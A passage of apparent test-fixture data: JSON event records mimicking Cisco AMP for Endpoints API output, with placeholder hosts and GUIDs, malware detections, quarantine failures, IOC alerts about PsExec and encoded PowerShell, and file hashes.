found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 